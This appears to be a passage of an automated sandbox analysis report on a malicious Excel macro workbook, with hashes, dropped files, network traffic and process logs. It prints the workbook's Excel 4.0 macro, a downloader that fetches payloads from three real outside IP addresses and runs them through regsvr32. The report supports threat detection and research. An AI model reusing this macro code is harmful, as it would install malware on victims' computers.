Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
  • 185.117.73.74
Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
  • 185.117.73.74
xa6FEoUw0W.dllGet hashmaliciousBrowse
  • 188.116.36.211
tszs3mwUbe.exeGet hashmaliciousBrowse
  • 185.45.193.29
pZ50mMKSLi.exeGet hashmaliciousBrowse
  • 185.45.193.29
qTnwCotzR9.exeGet hashmaliciousBrowse
  • 185.45.193.29
PwBsqWQ7jJ.exeGet hashmaliciousBrowse
  • 185.45.193.29
aGDehjYIws.exeGet hashmaliciousBrowse
  • 185.198.57.204
Tjhsm8p85Y.exeGet hashmaliciousBrowse
  • 185.45.193.29
T23HJFoN2Y.exeGet hashmaliciousBrowse
  • 185.45.193.29
i7NsO9mhTD.exeGet hashmaliciousBrowse
  • 185.45.193.29
o7w2HSi17V.exeGet hashmaliciousBrowse
  • 185.141.27.225
AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
  • 185.198.57.204
4cDyOofgzT.xlsmGet hashmaliciousBrowse
  • 194.36.189.154
4cDyOofgzT.xlsmGet hashmaliciousBrowse
  • 194.36.189.154

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\61EBA0A8.jpg
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
Category:dropped
Size (bytes):139381
Entropy (8bit):7.677272725029824
Encrypted:false
SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
MD5:53918FB868F1540920FC189C6783FC7C
SHA1:135CB103C5B5125C80285A83AE728B559313BADC
SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
Malicious:false
Reputation:low
Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
C:\Users\user\AppData\Local\Temp\BC810000
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):153181
Entropy (8bit):7.664836337453019
Encrypted:false
SSDEEP:3072:ZmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO8:o4P4346PgZw9gQar
MD5:E4FBDF2FF77A5ADFF6AACD7304BD7EEE
SHA1:53FF6A54EE199FC68B8C39BB09F01396AE845116
SHA-256:AB0C85FF010CE08388A9700CD6B2B8DDF47BB60B603E8C6ED55C5C372D672D11
SHA-512:9760D3456CABDE62C1FE06328CDB02C9163B5C08C817B9A6306158E74FC802FF4FCFF0AB1DE637607BAD627FF2F154D4889CDA5ADB052FFE7C295DFAB60580E6
Malicious:false
Reputation:low
Preview: ..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N*.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!.*.. c....|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.||I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Jun 26 00:35:31 2021, atime=Sat Jun 26 00:35:31 2021, length=8192, window=hide
Category:dropped
Size (bytes):904
Entropy (8bit):4.658127202566864
Encrypted:false
SSDEEP:12:8eXUCNuElPCH2Adj2YCM8+WrjAZ/2bDkLLC5Lu4t2Y+xIBjKZm:86wtLeAZiDf87aB6m
MD5:87388EE08506D1EE40D9A3C4197FFC82
SHA1:CF907AD5562A48A7FFC0FE5336C458C8A577AA3C
SHA-256:EA5E6C088BEAE071FE7042B1A972B8AC5310D89EFD8F0AE884093DF7927BF346
SHA-512:FFB3A81B29FA707E52F19C6CF43E9AE15D278634A3CD87D408558C29854F9635E11AB8868B5B94A6B1AD11EAA2368774056421B87E6A6BD9A99EB73857891F58
Malicious:false
Reputation:low
Preview: L..................F........N....-..v.i.+j..v.i.+j... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rf.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..Rf......S....................M.Z.h.a.r.d.z.....~.1......Rp...Desktop.h.......Ny..Rp......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-1984690372-06252021.xlsm.LNK
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Sat Jun 26 00:35:31 2021, atime=Sat Jun 26 00:35:31 2021, length=153172, window=hide
Category:dropped
Size (bytes):2320
Entropy (8bit):4.6844476786089615
Encrypted:false
SSDEEP:24:83Gjwt7Y32wcAN8Q62wdD/Y7aB6my3Gjwt7Y32wcAN8Q62wdD/Y7aB6m:83cV2wbNS2wZNB6p3cV2wbNS2wZNB6
MD5:8CE247A60514FD55D87BBC650952272A
SHA1:CB6DF1A328A264C3B6E8357CF7466BE17A3FF80F
SHA-256:DD7EB23FC9BE283CA2C0C46AEDF4310F5423C0F1F546EB11756735C07D250BC9
SHA-512:53C8B787966C9EAA1C4F472F641BEAAAB2BAE04FC6EAFCD2E2DE604738D8362853A24592588E7A36B4E0E47F7BA51BC963B192866AB77E7E1A8998BC32FECB2D
Malicious:true
Reputation:low
Preview: L..................F.... ....[..:....2p.+j...2p.+j..TV...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rf.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..Rf......S....................M.Z.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..Rf......Y..............>......B&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...Rl. .PERMIS~1.XLS..x......>Qvx.Rl.....h.........................P.e.r.m.i.s.s.i.o.n.-.1.9.8.4.6.9.0.3.7.2.-.0.6.2.5.2.0.2.1...x.l.s.m.......i...............-.......h...........>.S......C:\Users\user\Desktop\Permission-1984690372-06252021.xlsm..:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.1.9.8.4.6.9.0.3.7.2.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...+..-.........-..!a..%.H.VZAj...+..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):160
Entropy (8bit):4.844404183292729
Encrypted:false
SSDEEP:3:oyBVomxW+Lxz5XQ8rpStLxz5XQ8rpSmxW+Lxz5XQ8rpSv:djHz5AcpEFz5AcpJz5Acpc
MD5:9C2BF0F9EACB92927C4AE706540E8857
SHA1:CAA033878091778826251CE918D2BF94A0936E0C
SHA-256:895765C7EFE0F6BD5A8C3108AA51DFC0D071B1A0CFE3DD9FCAD21C11FE58ABD7
SHA-512:D29CC84B4217316459A479D9303F610F2D92A3F1D44C99C9EF409EFA2E971C3A771D0B8D778A26FCB1C20EAC33F7EFFA5015E728E86D13740D8EF76351200A98
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Permission-1984690372-06252021.xlsm.LNK=0..Permission-1984690372-06252021.xlsm.LNK=0..[misc]..Permission-1984690372-06252021.xlsm.LNK=0..
C:\Users\user\Desktop\4D810000
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):153172
Entropy (8bit):7.664824079469473
Encrypted:false
SSDEEP:3072:XmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOv:24P4346PgZw9gQaI
MD5:D47850141E48042EBAF73ED0CB53B325
SHA1:EE55511A64F670125FE2A5A206D9999886BC78CE
SHA-256:C59CFE11199BC497491C36ED270CC3CE67803C6638BF2C2162DB032ED6F37541
SHA-512:26BFFD5E6AC77BEEE5CF3D052F163829BF5B6C3E543B64E604E94A28581D447817BB8769801483E4CE640337BCC9A7E81DA3C407BAA24006A5B204E174EB32DE
Malicious:false
Reputation:low
Preview: ..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N*.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!.*.. c....|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.||I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsm
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.6081032063576088
Encrypted:false
SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:836727206447D2C6B98C973E058460C9
SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:true
Reputation:high, very likely benign file
Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.666395274852154
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Permission-1984690372-06252021.xlsm
File size:153750
MD5:f9272d851155983c3326ae7bcd99e489
SHA1:caaa6700907da09efc9d7831ec9a0dc636bdbe74
SHA256:80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d
SHA512:3e8d912568a35cc56af075b26f939b08bc5bd3ec0163e4a63c8cb563dcb85c74e7ad6ff9a5e5f457cda57af9edcec724dabda3ac32d89e9409b5c669096d037f
SSDEEP:3072:mmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:d4P4346PgZw9gQaVJ
File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:74ecd0e2f696908c

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Permission-1984690372-06252021.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
=EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
06/25/21-18:28:50.560988TCP1201ATTACK-RESPONSES 403 Forbidden8049169190.14.37.3192.168.2.22
06/25/21-18:28:50.962858TCP1201ATTACK-RESPONSES 403 Forbidden8049170185.183.99.120192.168.2.22

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 25, 2021 18:35:32.823625088 CEST4969680192.168.2.3185.240.103.219
Jun 25, 2021 18:35:32.913559914 CEST8049696185.240.103.219192.168.2.3
Jun 25, 2021 18:35:33.574708939 CEST4969680192.168.2.3185.240.103.219
Jun 25, 2021 18:35:33.664232969 CEST8049696185.240.103.219192.168.2.3
Jun 25, 2021 18:35:34.168436050 CEST4969680192.168.2.3185.240.103.219
Jun 25, 2021 18:35:34.258100986 CEST8049696185.240.103.219192.168.2.3
Jun 25, 2021 18:35:34.270447969 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:35:34.478802919 CEST8049698190.14.37.3192.168.2.3
Jun 25, 2021 18:35:34.479248047 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:35:34.480345011 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:35:34.689157963 CEST8049698190.14.37.3192.168.2.3
Jun 25, 2021 18:35:35.281904936 CEST8049698190.14.37.3192.168.2.3
Jun 25, 2021 18:35:35.282042980 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:35:35.297221899 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:35:35.359807014 CEST8049699185.183.99.120192.168.2.3
Jun 25, 2021 18:35:35.359909058 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:35:35.360621929 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:35:35.422379971 CEST8049699185.183.99.120192.168.2.3
Jun 25, 2021 18:35:35.642898083 CEST8049699185.183.99.120192.168.2.3
Jun 25, 2021 18:35:35.643012047 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:36:29.611803055 CEST8049698190.14.37.3192.168.2.3
Jun 25, 2021 18:36:29.612025976 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:36:40.644520998 CEST8049699185.183.99.120192.168.2.3
Jun 25, 2021 18:36:40.644608021 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:37:22.769884109 CEST4969980192.168.2.3185.183.99.120
Jun 25, 2021 18:37:22.770740986 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:37:22.832444906 CEST8049699185.183.99.120192.168.2.3
Jun 25, 2021 18:37:23.331918955 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:37:24.363290071 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:37:26.410351038 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:37:30.504642010 CEST4969880192.168.2.3190.14.37.3
Jun 25, 2021 18:37:38.692531109 CEST4969880192.168.2.3190.14.37.3

HTTP Request Dependency Graph

  • 190.14.37.3
  • 185.183.99.120

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.349698190.14.37.380C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
TimestampkBytes transferredDirectionData
Jun 25, 2021 18:35:34.480345011 CEST210OUTGET /44372.7746763889.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 190.14.37.3
Connection: Keep-Alive
Jun 25, 2021 18:35:35.281904936 CEST211INHTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 25 Jun 2021 16:35:35 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.349699185.183.99.12080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
TimestampkBytes transferredDirectionData
Jun 25, 2021 18:35:35.360621929 CEST211OUTGET /44372.7746763889.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.183.99.120
Connection: Keep-Alive
Jun 25, 2021 18:35:35.642898083 CEST212INHTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 25 Jun 2021 16:35:50 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:18:35:27
Start date:25/06/2021
Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:0x1250000
File size:27110184 bytes
MD5 hash:5D6638F2C8F8571C593999C58866007E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:18:35:35
Start date:25/06/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32 ..\Kro.fis
Imagebase:0xdb0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:18:35:35
Start date:25/06/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32 ..\Kro.fis1
Imagebase:0xdb0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:18:35:36
Start date:25/06/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32 ..\Kro.fis2
Imagebase:0xdb0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Reset < >